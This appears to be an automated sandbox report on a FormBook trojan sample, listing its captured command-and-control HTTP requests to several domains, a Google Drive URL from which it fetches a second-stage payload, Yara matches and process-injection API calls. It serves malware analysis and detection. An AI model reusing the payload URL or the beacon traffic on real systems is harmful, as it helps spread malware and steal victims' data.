        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.meliorras.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=Xg8FqCUssmOzcClrP1dUBt9Tduj8pb94TVXDuPCTJTreZhcpD3ySUs7Oc+hlxVab0la101jy3sXphv2K+D5gks93TxumRvYq05TzXtp4wx5urQWvjqWwNhA=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.guiguigohost.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noonartists.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.alpinebretech.lifeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /m9so/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.alpinebretech.lifeOrigin: http://www.alpinebretech.lifeReferer: http://www.alpinebretech.life/m9so/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4a 49 46 31 56 2b 66 73 58 70 51 76 39 6a 4d 78 59 36 63 56 50 45 6f 68 43 71 33 6c 59 70 4c 49 63 64 30 4e 41 4c 45 41 64 68 7a 44 33 70 6f 66 45 54 58 71 54 45 2f 66 61 78 46 62 5a 47 57 63 64 41 73 4a 46 79 77 70 33 78 58 74 7a 61 77 31 4b 54 6d 46 4a 50 75 47 64 64 64 2f 44 57 57 39 6f 58 70 69 74 52 69 64 30 57 71 6e 37 61 57 4a 50 33 6e 36 31 2f 46 49 78 45 76 36 52 4d 30 4b 43 73 4d 6a 73 39 4e 4c 4b 63 38 35 43 34 42 56 76 78 30 44 68 34 54 6f 76 6a 41 73 4d 59 61 66 54 68 31 65 75 77 33 48 67 74 5a 45 43 6f 35 50 67 6a 63 52 77 77 3d 3d Data Ascii: LFPxWlV=ghHQ3Gr/MCFEJIF1V+fsXpQv9jMxY6cVPEohCq3lYpLIcd0NALEAdhzD3pofETXqTE/faxFbZGWcdAsJFywp3xXtzaw1KTmFJPuGddd/DWW9oXpitRid0Wqn7aWJP3n61/FIxEv6RM0KCsMjs9NLKc85C4BVvx0Dh4TovjAsMYafTh1euw3HgtZECo5PgjcRww==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:55:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Grundforbedre39.exe, 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000000.00000000.792517395.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000004.00000000.1037768480.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
        Source: Grundforbedre39.exe, 00000004.00000002.1277691760.00000000348B0000.00000004.00001000.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162332275.000000000523F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download
        Source: Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=downloade.
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355534E0 NtCreateMutant,LdrInitializeThunk,4_2_355534E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_35552D10
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35552B90
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35554570 NtSuspendThread,4_2_35554570
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35554260 NtSetContextThread,4_2_35554260
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552D50 NtWriteVirtualMemory,4_2_35552D50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552DC0 NtAdjustPrivilegesToken,4_2_35552DC0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552DA0 NtReadVirtualMemory,4_2_35552DA0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C50 NtUnmapViewOfSection,4_2_35552C50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C10 NtOpenProcess,4_2_35552C10
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35553C30 NtOpenProcessToken,4_2_35553C30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C30 NtMapViewOfSection,4_2_35552C30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C20 NtSetInformationFile,4_2_35552C20
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552CD0 NtEnumerateKey,4_2_35552CD0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552CF0 NtDelayExecution,4_2_35552CF0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35553C90 NtOpenThread,4_2_35553C90
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552F00 NtCreateFile,4_2_35552F00
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552F30 NtOpenDirectoryObject,4_2_35552F30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552FB0 NtSetValueKey,4_2_35552FB0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552E50 NtCreateSection,4_2_35552E50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552E00 NtQueueApcThread,4_2_35552E00
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552ED0 NtResumeThread,4_2_35552ED0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552EC0 NtQuerySection,4_2_35552EC0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004066E20_2_004066E2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00404AF50_2_00404AF5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EA5264_2_355EA526
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DF5C94_2_355DF5C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D75C64_2_355D75C6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355204454_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D67574_2_355D6757
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552A7604_2_3552A760
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DE7094_2_355DE709
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CD6464_2_355CD646
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355446704_2_35544670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553C6004_2_3553C600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DF6F64_2_355DF6F6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551C6E04_2_3551C6E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355936EC4_2_355936EC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355206804_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F1134_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E010E4_2_355E010E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BD1304_2_355BD130
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355251C04_2_355251C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E04_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CE0764_2_355CE076
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552B0D04_2_3552B0D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D70F14_2_355D70F1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355100A04_2_355100A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E3104_2_3552E310
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DF3304_2_355DF330
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CC3FC4_2_355CC3FC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355113804_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D2104_2_3553D210
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D2EC4_2_3550D2EC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D7D4C4_2_355D7D4C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520D694_2_35520D69
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E1D2E4_2_355E1D2E
